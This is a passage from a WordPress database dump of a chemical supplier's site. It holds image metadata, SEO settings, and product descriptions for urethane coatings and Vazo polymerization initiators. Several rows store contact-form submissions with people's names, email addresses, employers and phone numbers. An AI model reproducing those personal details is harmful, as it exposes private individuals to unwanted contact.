'a:6:{s:5:"width";i:1113;s:6:"height";i:647;s:4:"file";s:42:"2016/10/automotive-bearing-lubrication.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"automotive-bearing-lubrication-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"automotive-bearing-lubrication-800x465.jpg";s:5:"width";i:800;s:6:"height";i:465;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"automotive-bearing-lubrication-768x446.jpg";s:5:"width";i:768;s:6:"height";i:446;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"automotive-bearing-lubrication-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"automotive-bearing-lubrication-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"automotive-bearing-lubrication-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"automotive-bearing-lubrication-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23097, 2505, '_wp_attached_file', '2016/10/shutterstock_130196291.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23098, 2505, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:34:"2016/10/shutterstock_130196291.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_130196291-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_130196291-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_130196291-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_130196291-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_130196291-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_130196291-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_130196291-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_130196291-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23099, 2503, '_thumbnail_id', '2505'); 
INSERT INTO `wp_postmeta` VALUES (23101, 2503, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (23102, 2503, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (23103, 2503, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23104, 2503, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (23105, 2503, '_yoast_wpseo_focuskw_text_input', 'Automotive Bearing'); 
INSERT INTO `wp_postmeta` VALUES (23106, 2503, '_yoast_wpseo_focuskw', 'Automotive Bearing'); 
INSERT INTO `wp_postmeta` VALUES (23107, 2503, '_yoast_wpseo_title', 'Krytox Automotive Bearing Lubrication Applications'); 
INSERT INTO `wp_postmeta` VALUES (23108, 2503, '_yoast_wpseo_metadesc', 'Krytox™ oils and greases have proven scientific and technical properties to help solve the most critical issues for automotive bearing lubrication needs,'); 
INSERT INTO `wp_postmeta` VALUES (23109, 2503, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23110, 2503, '_yoast_wpseo_focuskeywords', '[{"keyword":"Bearing Lubrication","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (23111, 2503, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (23112, 425, '_wp_old_slug', 'semi-permanent-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (23114, 2503, '_yoast_wpseo_linkdex', '88'); 
INSERT INTO `wp_postmeta` VALUES (23115, 2507, '_edit_lock', '1476300509:2'); 
INSERT INTO `wp_postmeta` VALUES (23116, 2507, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (23117, 1754, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23118, 735, '_wp_old_slug', 'ms-470c'); 
INSERT INTO `wp_postmeta` VALUES (23119, 735, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23120, 735, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23121, 735, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23122, 735, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23123, 735, '_ywtm_content_tab_description', 'Miller-Stephenson\'s Urethane Conformal Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson\'s Urethane Conformal Coating have the following benefits:\r\n<ul>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>No cracking or crazing with vibration</li>\r\n</ul>\r\nPolyurethane coatings are available as either aerosol or bulk formulations. Both formulations provide excellent humidity resistance and far greater chemical resistance than Acrylic coatings. Single component Polyurethanes, while easy to apply, enjoy long pot life but sometimes require very lengthy cure cycles to achieve full or optimum cure. The cure cycle can be accelerated by the application of heat typically reducing cure times to less than 4-5 hours at 50% humidity.'); 
INSERT INTO `wp_postmeta` VALUES (23124, 735, '_yoast_wpseo_focuskw_text_input', 'Urethane Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23125, 735, '_yoast_wpseo_focuskw', 'Urethane Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23126, 1152, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23127, 1152, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23128, 1152, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23129, 1152, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (23130, 1152, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-111","score":"na"}]'); 
INSERT INTO `wp_postmeta` VALUES (23131, 735, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23132, 1756, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23133, 736, '_wp_old_slug', 'ms-472c'); 
INSERT INTO `wp_postmeta` VALUES (23134, 736, '_yoast_wpseo_focuskw_text_input', 'Urethane Coating'); 
INSERT INTO `wp_postmeta` VALUES (23135, 736, '_yoast_wpseo_focuskw', 'Urethane Coating'); 
INSERT INTO `wp_postmeta` VALUES (23136, 736, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23137, 736, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23138, 736, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23139, 736, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23140, 736, '_ywtm_content_tab_description', 'Miller-Stephenson’s Urethane Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson’s Urethane Conformal Coating have the following benefits:\r\n<ul>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>No cracking or crazing with vibration</li>\r\n 	<li>Superior toughness and abrasion resistance</li>\r\n</ul>\r\nPolyurethane coatings are available as either aerosol or bulk formulations. Both formulations provide excellent humidity resistance and far greater chemical resistance than Acrylic coatings. Single component Polyurethanes, while easy to apply, enjoy long pot life but sometimes require very lengthy cure cycles to achieve full or optimum cure. The cure cycle can be accelerated by the application of heat typically reducing cure times to less than 4-5 hours at 50% humidity.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. MS-470C will cover 8.6 square feet at a 2-mil thickness per 14-oz. aerosol can.  MS-472C, the bulk liquid version of the product, is available in quarts and gallons for dip, brush, or spray applications and will cover 120 square feet per gallon at a 2-mil thickness. Printed circuit boards or electronics covered with urethane coating are repairable.  Simply heat the coating with a soldering iron to remove the components.\r\n\r\nUrethane Conformal Coatings provide a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>'); 
INSERT INTO `wp_postmeta` VALUES (23141, 736, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23142, 1600, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23143, 427, '_wp_old_slug', 'vazo-64'); 
INSERT INTO `wp_postmeta` VALUES (23144, 427, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23145, 427, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23146, 427, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23147, 427, '_yoast_wpseo_focuskw_text_input', 'VAZO 64 radical initiator'); 
INSERT INTO `wp_postmeta` VALUES (23148, 427, '_yoast_wpseo_focuskw', 'VAZO 64 radical initiator'); 
INSERT INTO `wp_postmeta` VALUES (23149, 427, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23150, 427, '_yoast_wpseo_focuskeywords', '[{"keyword":"AIBN","score":"good"},{"keyword":"Azobisisobutyronitrile","score":"good"},{"keyword":"2,2’azobis-(2-isobutyronitrile)","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (23151, 427, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23152, 427, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23153, 427, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23154, 427, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23155, 427, '_ywtm_content_tab_description', '<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\r\n\r\nVAZO 64 radical initiator, also known as AIBN (Azobisisobutyronitrile), is a free radical source (FRS) typically used as a polymerization initiator. VAZO 64 radical initiator is one of the most widely used initiators, which thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Its low molecular weight allows it to be one of the most cost effective options, with a higher mole per pound than other initiators.  Benefits include:\r\n<ul>\r\n 	<li>Very Cost Effective</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization; Low polydispersity</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\nAll the grades are Vazo radical Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\r\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\r\n\r\n<ul>\r\n 	<li>\r\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\r\n 	<li>\r\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</div></li>\r\n 	<li>\r\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\r\n 	<li>\r\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\r\n 	<li>\r\n<div>Are available in four grades to use over a wide temperature range.</div></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (23156, 427, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (23157, 1280, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23158, 575, '_wp_old_slug', 'vazo-67'); 
INSERT INTO `wp_postmeta` VALUES (23159, 575, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23160, 575, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23161, 575, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23162, 575, '_yoast_wpseo_focuskw_text_input', 'VAZO 67 Radical Initiator'); 
INSERT INTO `wp_postmeta` VALUES (23163, 575, '_yoast_wpseo_focuskw', 'VAZO 67 Radical Initiator'); 
INSERT INTO `wp_postmeta` VALUES (23164, 575, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23165, 575, '_yoast_wpseo_focuskeywords', '[{"keyword":"polymerization initiator","score":"good"},{"keyword":"AMBN","score":"good"},{"keyword":"2,2’-Azodi(2-methylbutyronitrile)","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (23167, 2513, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23168, 2513, '_seq_num', '45'); 
INSERT INTO `wp_postmeta` VALUES (23169, 2513, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23170, 2513, '_field_1', 'Brandon McAlister'); 
INSERT INTO `wp_postmeta` VALUES (23171, 2513, '_field_10', 'US Navy'); 
INSERT INTO `wp_postmeta` VALUES (23172, 2513, '_field_2', 'brandon.mcalister@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (23173, 2513, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (23174, 2513, '_field_3', 'Looking for the following product&#039;s GHS Complant Safety Data Sheet.\n\nNSN: 9150-01-443-9003.\n\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (23175, 2513, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23176, 2513, '_sub_id', '2513'); 
INSERT INTO `wp_postmeta` VALUES (23177, 2514, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23178, 2514, '_seq_num', '46'); 
INSERT INTO `wp_postmeta` VALUES (23179, 2514, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23180, 2514, '_field_1', 'Allen'); 
INSERT INTO `wp_postmeta` VALUES (23181, 2514, '_field_10', 'Invensis'); 
INSERT INTO `wp_postmeta` VALUES (23182, 2514, '_field_2', 'allen.s@invensis.net'); 
INSERT INTO `wp_postmeta` VALUES (23183, 2514, '_field_8', '(302) 261-9036'); 
INSERT INTO `wp_postmeta` VALUES (23184, 2514, '_field_3', '&quot;Hi, \r\n\r\n   This is Allen, I am writing this email to request for the product name is MS-143V PTFE Release Agent/Dry Lubricant\r\n , the current revision date is  1/12/2011 to update GHS info. We tried to find the document on the website could not found so could you please provide us the latest pdf file.\r\n\r\n Looking forward for your valuable revert.\r\n\r\nThanks \r\nAllen&quot;									\r\n'); 
INSERT INTO `wp_postmeta` VALUES (23185, 2514, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23186, 2514, '_sub_id', '2514'); 
INSERT INTO `wp_postmeta` VALUES (23187, 2514, '_edit_lock', '1476273793:1'); 
INSERT INTO `wp_postmeta` VALUES (23195, 2526, '_edit_lock', '1476278461:1'); 
INSERT INTO `wp_postmeta` VALUES (23196, 2526, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (23198, 2526, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (23199, 2526, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (23200, 2528, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23201, 2528, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (23202, 2528, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (23203, 2528, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (23204, 2528, '_menu_item_object_id', '2526'); 
INSERT INTO `wp_postmeta` VALUES (23205, 2528, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (23206, 2528, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (23207, 2528, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (23208, 2528, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (23209, 2528, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (23210, 2526, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23211, 2526, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (23212, 2526, '_yoast_wpseo_content_score', '90'); 
INSERT INTO `wp_postmeta` VALUES (23213, 2526, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23216, 2544, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23217, 2544, '_seq_num', '43'); 
INSERT INTO `wp_postmeta` VALUES (23218, 2544, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23219, 2544, '_field_12', 'Douglas Streeten'); 
INSERT INTO `wp_postmeta` VALUES (23220, 2544, '_field_13', 'Zimmer Biomet'); 
INSERT INTO `wp_postmeta` VALUES (23221, 2544, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23222, 2544, '_field_14', 'doug.streeten@zimmerbiomet.com'); 
INSERT INTO `wp_postmeta` VALUES (23223, 2544, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23224, 2544, '_field_16', 'I would like to request an MSDS for MS-132FE.  It will be used to assist with a cleaning validation here at Zimmer Biomet.'); 
INSERT INTO `wp_postmeta` VALUES (23225, 2544, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23226, 2544, '_sub_id', '2544'); 
INSERT INTO `wp_postmeta` VALUES (23232, 2546, '_wp_attached_file', '2016/10/shutterstock_355004969.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23233, 2546, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4985;s:6:"height";i:3324;s:4:"file";s:34:"2016/10/shutterstock_355004969.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_355004969-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_355004969-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_355004969-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_355004969-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_355004969-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_355004969-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_355004969-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_355004969-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23235, 2549, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23236, 2549, '_seq_num', '47'); 
INSERT INTO `wp_postmeta` VALUES (23237, 2549, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23238, 2549, '_field_1', 'Joe Boyce'); 
INSERT INTO `wp_postmeta` VALUES (23239, 2549, '_field_10', 'Dicks Plumbing and Heating'); 
INSERT INTO `wp_postmeta` VALUES (23240, 2549, '_field_2', 'joe@dicksplumbingandheating.com'); 
INSERT INTO `wp_postmeta` VALUES (23241, 2549, '_field_8', '(218) 751-4964'); 
INSERT INTO `wp_postmeta` VALUES (23242, 2549, '_field_3', 'Please help we need grease for medical gas hook-up&#039;s (Oxygen). Small tubes for our guys doing install at hospitals.... '); 
INSERT INTO `wp_postmeta` VALUES (23243, 2549, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23244, 2549, '_sub_id', '2549'); 
INSERT INTO `wp_postmeta` VALUES (23245, 2507, '_thumbnail_id', '2546'); 
INSERT INTO `wp_postmeta` VALUES (23247, 2507, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (23248, 2507, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (23249, 2507, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (23250, 2507, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23251, 2507, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (23252, 2507, '_yoast_wpseo_focuskw_text_input', 'Prepare Bearings'); 
INSERT INTO `wp_postmeta` VALUES (23253, 2507, '_yoast_wpseo_focuskw', 'Prepare Bearings'); 
INSERT INTO `wp_postmeta` VALUES (23254, 2507, '_yoast_wpseo_title', 'How to Prepare Bearings with Krytox Lubricants - Step by Step'); 
INSERT INTO `wp_postmeta` VALUES (23255, 2507, '_yoast_wpseo_metadesc', 'This guide explains how to prepare bearings with Krytox Lubricants. Dirt is one of a bearing’s worst enemies. Properly cleaning a bearing is essential.'); 
INSERT INTO `wp_postmeta` VALUES (23256, 2507, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23257, 2507, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23258, 2507, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (23259, 575, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23260, 575, '_wp_old_slug', 'radical-initiators'); 
INSERT INTO `wp_postmeta` VALUES (23261, 575, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23262, 575, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23263, 575, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23264, 575, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23265, 575, '_ywtm_content_tab_description', 'Vazo 67 radical initiator, also known as AMBN 2,2’-Azodi(2-methylbutyronitrile), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 67 has similar thermal characteristics to Vazo 64, with the advantages of a safer decomposition product and higher solubility in a broader range of organic solvents. Can be used as a drop-in for AIBN initiator and it will decomposes to generate free radicals and nitrogen gas.   Benefits include:\r\n<ul>\r\n 	<li>Highest solubility in  solvents or monomers</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization: Low Polydispersity</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\r\n\r\nAll the grades are Vazo radical Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\r\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\r\n\r\n<ul>\r\n 	<li>\r\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\r\n 	<li>\r\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</div></li>\r\n 	<li>\r\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\r\n 	<li>\r\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\r\n 	<li>\r\n<div>Are available in four grades to use over a wide temperature range.</div></li>\r\n</ul>\r\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]);'); 
INSERT INTO `wp_postmeta` VALUES (23267, 2507, '_yoast_wpseo_linkdex', '91'); 
INSERT INTO `wp_postmeta` VALUES (23268, 2552, '_edit_lock', '1476301650:2'); 
INSERT INTO `wp_postmeta` VALUES (23269, 2552, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (23270, 2553, '_wp_attached_file', '2016/10/shutterstock_405633937.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23271, 2553, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:3375;s:4:"file";s:34:"2016/10/shutterstock_405633937.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_405633937-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_405633937-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_405633937-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_405633937-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_405633937-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_405633937-200x200.jpg";s:5:"width";i:200;s:6: